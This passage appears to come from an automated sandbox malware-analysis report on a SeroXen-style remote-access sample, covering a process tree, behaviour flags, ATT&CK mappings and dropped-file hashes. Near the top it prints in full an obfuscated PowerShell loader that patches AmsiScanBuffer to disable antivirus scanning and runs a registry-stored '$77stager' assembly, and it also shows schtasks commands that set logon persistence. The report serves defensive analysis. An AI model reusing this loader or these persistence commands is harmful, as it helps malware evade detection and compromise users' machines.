5)+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lnqSMoLAdbVn{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gWwgDuiRWzISGU,[Parameter(Position=1)][Type]$PvakLvKGlb)$dJPmHnztWtp=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType(''+'M'+'y'+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+'l'+'ass'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+'s'+''+'s'+''+','+'Au'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$dJPmHnztWtp.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+'N'+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$gWwgDuiRWzISGU).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$dJPmHnztWtp.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+''+[Char](101)+'ByS'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$PvakLvKGlb,$gWwgDuiRWzISGU).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $dJPmHnztWtp.CreateType();}$LXKiTThecjIPP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+''+'.'+'U'+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+'i'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+'od'+'s'+'');$PMprQEOyhBBaHV=$LXKiTThecjIPP.GetMethod('G'+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+'o'+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WSmicDrtOmJjfGWgbEO=lnqSMoLAdbVn @([String])([IntPtr]);$zuKRlHYVRIoPwAbEKMQPsd=lnqSMoLAdbVn @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WfNMRYRSLMn=$LXKiTThecjIPP.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+'le'+[Char](72)+'a'+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+'l'+'3'+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$oAkirkdGzjdHua=$PMprQEOyhBBaHV.Invoke($Null,@([Object]$WfNMRYRSLMn,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+[Char](105)+'b'+'r'+'ar'+[Char](121)+''+'A'+'')));$ELyDblsOOKJgVhxqR=$PMprQEOyhBBaHV.Invoke($Null,@([Object]$WfNMRYRSLMn,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+'t'+'')));$SGTAPhX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oAkirkdGzjdHua,$WSmicDrtOmJjfGWgbEO).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$dRSQFeXMHinBuhCAL=$PMprQEOyhBBaHV.Invoke($Null,@([Object]$SGTAPhX,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+'e'+''+[Char](114)+'')));$pZlUlaCefs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ELyDblsOOKJgVhxqR,$zuKRlHYVRIoPwAbEKMQPsd).Invoke($dRSQFeXMHinBuhCAL,[uint32]8,4,[ref]$pZlUlaCefs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dRSQFeXMHinBuhCAL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ELyDblsOOKJgVhxqR,$zuKRlHYVRIoPwAbEKMQPsd).Invoke($dRSQFeXMHinBuhCAL,[uint32]8,0x20,[ref]$pZlUlaCefs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+'s'+'tage'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4804

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1564

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
- Modifies Internet Explorer settings
PID:1784

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x300 0x4e0
2⤵
PID:4616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1960

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2516

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2748

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3268

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
PID:3408

C:\Users\Admin\AppData\Local\Temp\Uni.exe
"C:\Users\Admin\AppData\Local\Temp\Uni.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2400

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:640

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4996

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:2840

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
4⤵
- Executes dropped EXE
PID:1908

C:\Users\Admin\AppData\Local\Temp\6Rs8wA3zbw4c.exe
"C:\Users\Admin\AppData\Local\Temp\6Rs8wA3zbw4c.exe"
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4756 -s 1948
5⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1876

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
3⤵
- Executes dropped EXE
PID:4904

C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3552

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3748

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3940

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:448

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3852

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1616

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3132

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2168

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:1968

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5040

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3256

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:2252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3608

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClipping\ScreenClippingHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClipping\ScreenClippingHost.exe" -ServerName:ScreenClipping.AppXyz3w1x599ya8gjvt9jprqjvttt0dxhd7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:2780

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2780 -s 1896
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3148

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2780 -s 1896
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3996

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 424 -p 2780 -ip 2780
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4288

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 512 -p 2780 -ip 2780
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3896

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 3016 -ip 3016
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2872

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 3016 -ip 3016
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1084

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClipping\ScreenClippingHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClipping\ScreenClippingHost.exe" -ServerName:ScreenClipping.AppXyz3w1x599ya8gjvt9jprqjvttt0dxhd7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3016

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3016 -s 1828
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4808

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3016 -s 1904
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3080

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4756 -ip 4756
2⤵
PID:3252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1678.tmp.csv

Filesize
35KB

MD5
7eef3a932509151eb36db0f7af4651a8

SHA1
27b42aae1daa58c88f3fbbfcded2df433c48821d

SHA256
4298183221e14411321d80903bf0dce7e1fca64ab649929f2a54a61a9cd19892

SHA512
cf4377de4bc5bbfd878e2f390d5c9384484b29599a289fddc1dfe403a1b9e0d58f79ef3c1e803b56d6f6818fa5dd3fd4ba7d998247dcf9db1e21a509af9265e3

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1698.tmp.txt

Filesize
13KB

MD5
e617a2c24d68c56823219bbf958382c8

SHA1
bd17af38ca40522fee44161b44b18af8c14622c4

SHA256
1b1c5e6242fda60691c9d6c59e5a181612867b6a9701f667e339524551368ec6

SHA512
85becf6d5088de35c27be987e531a3620a70d2e6c921150625b67dc77b37ac288c6a2a8d3d157e4de334b2823d6060612cbc06337a62583cc86ae19d63329942

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER183F.tmp.csv

Filesize
35KB

MD5
6e6c204736848c8716d3670dbf019bdb

SHA1
3e316b622a09f028f65d5b78489ea7e13cefbffa

SHA256
1ea213f5b42a24c8ed22eb4df3972a4a92b6f90c07dfefe4650dadb2c50a66f9

SHA512
9d8899058a9fb01e4b4e6fb10a21271165882dc6acae299f2706bb08738f3a24368d61d58b54ef1e35ed77d961cc5bb8548e92815076dd9600612b6be39ad18f

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER185F.tmp.txt

Filesize
13KB

MD5
be459ba15eb3b6479a5422a0d621a71c

SHA1
1097e449b5fb31cdd366fb7ce55346f8ef4d9f9b

SHA256
d3b124104dbd501151a64c82c313ba6eb0dd6e7755e52d1325064a7e44b69008

SHA512
6ec0525874ccc43fa63ba1ecbddd29024676d35c2994d9a68615645361f728b7a3b9b8ad17491bbd8c6123d77b2f3e62c8e014c15804aa0d7350957cea34320e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C54.tmp.csv

Filesize
37KB

MD5
fd2bd132d6b5c8f8c888b9118c91568f

SHA1
da2573eebf3ecee5d62e9416cfa1e58c6caaeb84

SHA256
aaf8a13f36e01b4b33bfc65abad499d1f083815da8f02997d8ece5e2ed52eb80

SHA512
648a6ac157f025fbb3bbe5764d21ef60bb2c49bfba3dc0b4f101bcaa13d48b249584e55f5760fa62c3c36fc0b31acdb5aa5b4a934d922bfe73d9b37a8975be8a

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C74.tmp.txt

Filesize
13KB

MD5
f78b702f134ac84aa3484a72324a76cb

SHA1
b34c9a3ae4d69f9efa788459e1c189b466f3f094

SHA256
8494540199e86377d2053b7df5e8d10e963b8eb8413892889f0b606817734fe9

SHA512
a830e41d0dc1813d82e17e546e88dc00498027ebc1e8d67456490027227da03796bd4cca985b882e2e2efd243040b8cac0f92a0f5eed1aaf155b422ad6620446

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDD0.tmp.csv

Filesize
35KB

MD5
7618bc144e01667fa2e1c94c5166794c

SHA1
018dffa14a4418341c94f4f90ed7c89ce3e0c081

SHA256
be6d91a605f2c319e319f2ed82800a5c4144e00a56d9ae38ed506ff4d7e496de

SHA512
a3872705341f57ae72b2a16c15ac0cf2f38507bff5981d1ff1e6ba869f8c8777977f4dcd7e667e66f1df01c1a4d3b511745d325c252b8511703e5faae86b4d41

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDE0.tmp.txt

Filesize
13KB

MD5
95659b1d5676a71f0a23f4e7ff7c0b6a

SHA1
4cb47cd4d6e48f744d073551e53baa0bb6cbbfef

SHA256
d743f5aa704840669de33db221168aec01910b1f2eb42d6130a392ae43634fca

SHA512
0e4407c271ecfbb86a9846a9b09865a22969ee903ee236d52e36f39d009ecb5c682e5fb2c139ca32adbcdd2fdcd994b7163ed3ffa158357301ea1d0b3e97dbcc

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFA7.tmp.csv

Filesize
35KB

MD5
cd6e0bcea79c54cc800eb120f8929758

SHA1
87f51b1a036913650710cd15997e0bff9dfedf87

SHA256
128b2c7f299d3dc5bdad2aff5c2a3f9b4894f26916fa822c37f5fadcb5e77fe8

SHA512
4799166565d3265d9099dfc6ec72dd2bae90a4b397511189e79126df10efbe33302029070163e0e17ef6d4514f3f8a06391a53ea4ec157c9724bc612f9cfe6ab

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDFC7.tmp.txt

Filesize
13KB

MD5
df4ff3d9bb8f022ac3d06c9d00d8ced0

SHA1
71001c8577ebacc91a5f4431e0662b8a7f8ecd37

SHA256
47e3578797ecef86eb3a6825209e7431ebb611c9ac9c4885aa520f9b1dacb166

SHA512
bb3900ed4def1532b96808d2ca97c6af3900564152d02f2eb708225997cccbc97ec2a433b84f6c9235dc01571f7373e4a8f75bdd12970a704cb2dc6cbe0fc45d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
330B

MD5
3c12c690b9652ee25a8f6596223920b7

SHA1
5a2a5560274b5a084e0b4da0111fcc5dff13526b

SHA256
4b0e96e0a88d2722cbe4373f4ebcc2a60f681232822227193a8f5af928b01607

SHA512
7e51dc4bccdf55fe782cb19bcbecab9a45eeafcd797ef85430dee4eb926505337d1b5e71fa374c77f65dfa5a19ba23ab87c056f332562515396c29c86d363ebc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk

Filesize
8KB

MD5
a8edd5c71a2fe7fc6d0d72a86fab3a7a

SHA1
b7fc31a4a629c3d2ec762827a09c6c4be9e107bd

SHA256
c49c1dc639a5369a580ce5cb7377d65a2f247501b8db3098d608d65fd73e4156

SHA512
ba89555bfdc90bc784d293a11424581daf798b114143d598b92ebebe7082e7b4252cac24bbeb3530e165e12a96037f55c2613d200f723c4cee80f8477b1df0f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\6Rs8wA3zbw4c.exe

Filesize
276KB

MD5
120f3a38b2f4eb0f800ebe47ffa5e76b

SHA1
bed5148cc6a53e12a86ed635bb79135a568edd78

SHA256
3a195d762fd1e2f7f93eb4cbcef8fa9b600a6f94fc43b1c1c157b2c5e069154f

SHA512
60e66274203624afa422578d9807b21cbcc99de855dd665aa54753c957886677e358a2579ade098970c7ea3f9c3f2476c9e028fdabaac6ee991f09093fa52aff

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

Filesize
409KB

MD5
4c2bb0618a6eda615c8001d5a7ccd6c0

SHA1
c88d2c8bfc5906a5cfef78893d1132edcffd71f0

SHA256
abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

SHA512
6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_bi3e54la.aon.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
560B

MD5
59e01ca53eb6e3ffc344303e6bed9db3

SHA1
56440c055c3766f682cfd93550d58583d1775d8d

SHA256
af0fa390236f1023cc0c261e048c1c1ff511ee22a4f563929fed1ec0c8016ab0

SHA512
f032638172e8f643cc40b58862b2d14e03daae31d884b10b786dddba847af29d8468a5d62120994a501fbda9ab777b3814fe46b43be10048b655b644cf7c1507

Download Submit
